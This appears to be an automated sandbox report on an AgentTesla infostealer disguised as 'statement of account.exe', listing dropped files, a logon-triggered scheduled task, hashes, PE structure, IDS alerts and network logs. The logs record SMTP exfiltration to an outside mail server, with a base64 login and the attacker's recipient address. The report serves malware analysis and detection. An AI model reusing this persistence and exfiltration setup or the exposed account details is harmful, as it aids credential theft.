                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):777216
                                        Entropy (8bit):7.5421915933868116
                                        Encrypted:false
                                        SSDEEP:12288:nKdsyGFr5cE8LHW4RelEpb8bOmsX4K1hOCcTVURwq05Sgk2/SEdRMA/LyzIPPPuA:6ZvLrRGWb8OH1hO1UH0A49/LkInstA
                                        MD5:808F76963A9F42AD7310A3B7D65C7983
                                        SHA1:F748A841B2EC35BC40ED0BACBE953C28BC11A8A6
                                        SHA-256:9F04B0B059E331845F8C3F9F4F83C785B07766529BB24DBBFB02FBAB9E414938
                                        SHA-512:33681149A92FA03E80ED0E1C38DAC6672785DD058D40B74DAA75F649D8B7B78B315755FE81854919579A4FD9C1043AA52BCC5A46A3CCC954C1E6D3C16EA9A5CB
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 69%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.c..............P.................. ........@.. .......................@............@.................................m...O............................ ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p.......D...X...hD............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*&..(,....*...0..<........~.....(-.....,!r...p.....(....o/...s0............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o1....+..*...0..<........~.....(-.....,!rM..p.....(.
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):777216
                                        Entropy (8bit):7.5421915933868116
                                        Encrypted:false
                                        SSDEEP:12288:nKdsyGFr5cE8LHW4RelEpb8bOmsX4K1hOCcTVURwq05Sgk2/SEdRMA/LyzIPPPuA:6ZvLrRGWb8OH1hO1UH0A49/LkInstA
                                        MD5:808F76963A9F42AD7310A3B7D65C7983
                                        SHA1:F748A841B2EC35BC40ED0BACBE953C28BC11A8A6
                                        SHA-256:9F04B0B059E331845F8C3F9F4F83C785B07766529BB24DBBFB02FBAB9E414938
                                        SHA-512:33681149A92FA03E80ED0E1C38DAC6672785DD058D40B74DAA75F649D8B7B78B315755FE81854919579A4FD9C1043AA52BCC5A46A3CCC954C1E6D3C16EA9A5CB
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 69%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.c..............P.................. ........@.. .......................@............@.................................m...O............................ ..........T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p.......D...X...hD............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*&..(,....*...0..<........~.....(-.....,!r...p.....(....o/...s0............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o1....+..*...0..<........~.....(-.....,!rM..p.....(.
                                        Process:C:\Users\user\Desktop\statement of account.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):835
                                        Entropy (8bit):4.694294591169137
                                        Encrypted:false
                                        SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                        MD5:6EB47C1CF858E25486E42440074917F2
                                        SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                        SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                        SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                        Malicious:true
                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.5421915933868116
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:statement of account.exe
                                        File size:777216
                                        MD5:808f76963a9f42ad7310a3b7d65c7983
                                        SHA1:f748a841b2ec35bc40ed0bacbe953c28bc11a8a6
                                        SHA256:9f04b0b059e331845f8c3f9f4f83c785b07766529bb24dbbfb02fbab9e414938
                                        SHA512:33681149a92fa03e80ed0e1c38dac6672785dd058d40b74daa75f649d8b7b78b315755fe81854919579a4fd9c1043aa52bcc5a46a3ccc954c1e6d3c16ea9a5cb
                                        SSDEEP:12288:nKdsyGFr5cE8LHW4RelEpb8bOmsX4K1hOCcTVURwq05Sgk2/SEdRMA/LyzIPPPuA:6ZvLrRGWb8OH1hO1UH0A49/LkInstA
                                        TLSH:6DF47B9232B18673F49F4269142471CC2EBCB107B3D5E21B6F777A9152019BFF6A8E12
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.c..............P.................. ........@.. .......................@............@................................
                                        Icon Hash:00828e8e8686b000
                                        Entrypoint:0x4bf0c2
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6385659B [Tue Nov 29 01:51:23 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xbf06d0x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x5d4.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xbcac00x54.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xbd0c80xbd200False0.7888043208856577data7.547588668070066IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xc00000x5d40x600False0.4283854166666667data4.1649171913963645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xc20000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0xc00900x344data
                                        RT_MANIFEST0xc03e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.327.54.86.236496985872030171 11/29/22-15:00:43.881102TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49698587192.168.2.327.54.86.236
                                        192.168.2.327.54.86.236496995872851779 11/29/22-15:01:36.844935TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49699587192.168.2.327.54.86.236
                                        192.168.2.327.54.86.236497005872030171 11/29/22-15:02:05.481443TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49700587192.168.2.327.54.86.236
                                        192.168.2.327.54.86.236496995872840032 11/29/22-15:01:36.844935TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249699587192.168.2.327.54.86.236
                                        192.168.2.327.54.86.236496995872030171 11/29/22-15:01:36.844935TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49699587192.168.2.327.54.86.236
                                        192.168.2.327.54.86.236496985872840032 11/29/22-15:00:43.881210TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249698587192.168.2.327.54.86.236
                                        192.168.2.327.54.86.236497005872840032 11/29/22-15:02:05.481443TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249700587192.168.2.327.54.86.236
                                        192.168.2.327.54.86.236496985872851779 11/29/22-15:00:43.881210TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49698587192.168.2.327.54.86.236
                                        192.168.2.327.54.86.236497005872851779 11/29/22-15:02:05.481443TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49700587192.168.2.327.54.86.236
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 29, 2022 15:00:41.677078962 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:41.899986982 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:41.900111914 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:42.532310009 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:42.532679081 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:42.765861034 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:42.767602921 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:42.986309052 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:42.987276077 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:43.218561888 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:43.221143961 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:43.439682007 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:43.440382004 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:43.661010981 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:43.661220074 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:43.879781008 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:43.879849911 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:43.881102085 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:43.881210089 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:43.881963015 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:43.882033110 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:00:44.103292942 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:44.103827000 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:44.133389950 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:00:44.214205980 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:15.065963030 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:15.066122055 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:15.066195011 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:35.035937071 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:35.254525900 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:35.255534887 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:35.489814043 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:35.490119934 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:35.709023952 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:35.709719896 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:35.928637028 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:35.929243088 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:36.173568964 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:36.173923969 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:36.404695034 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:36.404953957 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:36.623428106 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:36.623859882 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:36.844022989 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:36.844043016 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:36.844934940 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:36.844934940 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:36.845040083 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:36.845040083 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:37.068934917 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:37.068984985 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:37.091022015 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:37.233287096 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:46.065416098 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:01:46.065510035 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:01:46.065653086 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:03.688148022 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:03.906955957 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:03.907115936 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:04.134960890 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:04.135234118 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:04.362472057 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:04.363462925 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:04.584319115 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:04.584578991 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:04.818763018 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:04.819016933 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:05.038481951 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:05.043325901 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:05.261754990 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:05.261979103 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:05.480773926 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:05.480839968 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:05.481442928 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:05.481442928 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:05.481442928 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:05.481442928 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:05.725141048 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:05.764801979 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:06.095102072 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:06.313374996 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:06.363890886 CET5874970027.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:06.407644033 CET49700587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:08.407546997 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:08.407614946 CET5874969927.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:08.407763958 CET49699587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:17.065481901 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:17.065603018 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:17.065640926 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:21.487787008 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:21.747932911 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:21.910847902 CET5874969827.54.86.236192.168.2.3
                                        Nov 29, 2022 15:02:21.910967112 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:21.911768913 CET49698587192.168.2.327.54.86.236
                                        Nov 29, 2022 15:02:22.133049965 CET5874969827.54.86.236192.168.2.3
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 29, 2022 15:00:41.584855080 CET4997753192.168.2.38.8.8.8
                                        Nov 29, 2022 15:00:41.644109011 CET53499778.8.8.8192.168.2.3
                                        Nov 29, 2022 15:01:34.988333941 CET5784053192.168.2.38.8.8.8
                                        Nov 29, 2022 15:01:35.008188009 CET53578408.8.8.8192.168.2.3
                                        Nov 29, 2022 15:02:03.632549047 CET5799053192.168.2.38.8.8.8
                                        Nov 29, 2022 15:02:03.662837029 CET53579908.8.8.8192.168.2.3
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 29, 2022 15:00:41.584855080 CET192.168.2.38.8.8.80x36e8Standard query (0)mail.clipjoint.co.nzA (IP address)IN (0x0001)false
                                        Nov 29, 2022 15:01:34.988333941 CET192.168.2.38.8.8.80xa70cStandard query (0)mail.clipjoint.co.nzA (IP address)IN (0x0001)false
                                        Nov 29, 2022 15:02:03.632549047 CET192.168.2.38.8.8.80x52b4Standard query (0)mail.clipjoint.co.nzA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 29, 2022 15:00:41.644109011 CET8.8.8.8192.168.2.30x36e8No error (0)mail.clipjoint.co.nz27.54.86.236A (IP address)IN (0x0001)false
                                        Nov 29, 2022 15:01:35.008188009 CET8.8.8.8192.168.2.30xa70cNo error (0)mail.clipjoint.co.nz27.54.86.236A (IP address)IN (0x0001)false
                                        Nov 29, 2022 15:02:03.662837029 CET8.8.8.8192.168.2.30x52b4No error (0)mail.clipjoint.co.nz27.54.86.236A (IP address)IN (0x0001)false
                                        TimestampSource PortDest PortSource IPDest IPCommands
                                        Nov 29, 2022 15:00:42.532310009 CET5874969827.54.86.236192.168.2.3220-cp-wc27.per01.ds.network ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 22:00:42 +0800
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Nov 29, 2022 15:00:42.532679081 CET49698587192.168.2.327.54.86.236EHLO 496536
                                        Nov 29, 2022 15:00:42.765861034 CET5874969827.54.86.236192.168.2.3250-cp-wc27.per01.ds.network Hello 496536 [102.129.143.49]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPE_CONNECT
                                        250-AUTH PLAIN LOGIN
                                        250-STARTTLS
                                        250 HELP
                                        Nov 29, 2022 15:00:42.767602921 CET49698587192.168.2.327.54.86.236AUTH login Y2xpcGpvaW50QGNsaXBqb2ludC5jby5ueg==
                                        Nov 29, 2022 15:00:42.986309052 CET5874969827.54.86.236192.168.2.3334 UGFzc3dvcmQ6
                                        Nov 29, 2022 15:00:43.218561888 CET5874969827.54.86.236192.168.2.3235 Authentication succeeded
                                        Nov 29, 2022 15:00:43.221143961 CET49698587192.168.2.327.54.86.236MAIL FROM:<clipjoint@clipjoint.co.nz>
                                        Nov 29, 2022 15:00:43.439682007 CET5874969827.54.86.236192.168.2.3250 OK
                                        Nov 29, 2022 15:00:43.440382004 CET49698587192.168.2.327.54.86.236RCPT TO:<geortiok4@gmail.com>
                                        Nov 29, 2022 15:00:43.661010981 CET5874969827.54.86.236192.168.2.3250 Accepted
                                        Nov 29, 2022 15:00:43.661220074 CET49698587192.168.2.327.54.86.236DATA
                                        Nov 29, 2022 15:00:43.879849911 CET5874969827.54.86.236192.168.2.3354 Enter message, ending with "." on a line by itself
                                        Nov 29, 2022 15:00:43.882033110 CET49698587192.168.2.327.54.86.236.
                                        Nov 29, 2022 15:00:44.133389950 CET5874969827.54.86.236192.168.2.3250 OK id=1p01AB-0002hr-Ol
                                        Nov 29, 2022 15:01:35.489814043 CET5874969927.54.86.236192.168.2.3220-cp-wc27.per01.ds.network ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 22:01:35 +0800
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Nov 29, 2022 15:01:35.490119934 CET49699587192.168.2.327.54.86.236EHLO 496536
                                        Nov 29, 2022 15:01:35.709023952 CET5874969927.54.86.236192.168.2.3250-cp-wc27.per01.ds.network Hello 496536 [102.129.143.49]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPE_CONNECT
                                        250-AUTH PLAIN LOGIN
                                        250-STARTTLS
                                        250 HELP
                                        Nov 29, 2022 15:01:35.709719896 CET49699587192.168.2.327.54.86.236AUTH login Y2xpcGpvaW50QGNsaXBqb2ludC5jby5ueg==
                                        Nov 29, 2022 15:01:35.928637028 CET5874969927.54.86.236192.168.2.3334 UGFzc3dvcmQ6
                                        Nov 29, 2022 15:01:36.173568964 CET5874969927.54.86.236192.168.2.3235 Authentication succeeded
                                        Nov 29, 2022 15:01:36.173923969 CET49699587192.168.2.327.54.86.236MAIL FROM:<clipjoint@clipjoint.co.nz>
                                        Nov 29, 2022 15:01:36.404695034 CET5874969927.54.86.236192.168.2.3250 OK
                                        Nov 29, 2022 15:01:36.404953957 CET49699587192.168.2.327.54.86.236RCPT TO:<geortiok4@gmail.com>
                                        Nov 29, 2022 15:01:36.623428106 CET5874969927.54.86.236192.168.2.3250 Accepted
                                        Nov 29, 2022 15:01:36.623859882 CET49699587192.168.2.327.54.86.236DATA
                                        Nov 29, 2022 15:01:36.844043016 CET5874969927.54.86.236192.168.2.3354 Enter message, ending with "." on a line by itself
                                        Nov 29, 2022 15:01:36.845040083 CET49699587192.168.2.327.54.86.236.
                                        Nov 29, 2022 15:01:37.091022015 CET5874969927.54.86.236192.168.2.3250 OK id=1p01B2-0003Ke-Nc
                                        Nov 29, 2022 15:02:04.134960890 CET5874970027.54.86.236192.168.2.3220-cp-wc27.per01.ds.network ESMTP Exim 4.95 #2 Tue, 29 Nov 2022 22:02:04 +0800
                                        220-We do not authorize the use of this system to transport unsolicited,
                                        220 and/or bulk e-mail.
                                        Nov 29, 2022 15:02:04.135234118 CET49700587192.168.2.327.54.86.236EHLO 496536
                                        Nov 29, 2022 15:02:04.362472057 CET5874970027.54.86.236192.168.2.3250-cp-wc27.per01.ds.network Hello 496536 [102.129.143.49]
                                        250-SIZE 52428800
                                        250-8BITMIME
                                        250-PIPELINING
                                        250-PIPE_CONNECT
                                        250-AUTH PLAIN LOGIN
                                        250-STARTTLS
                                        250 HELP
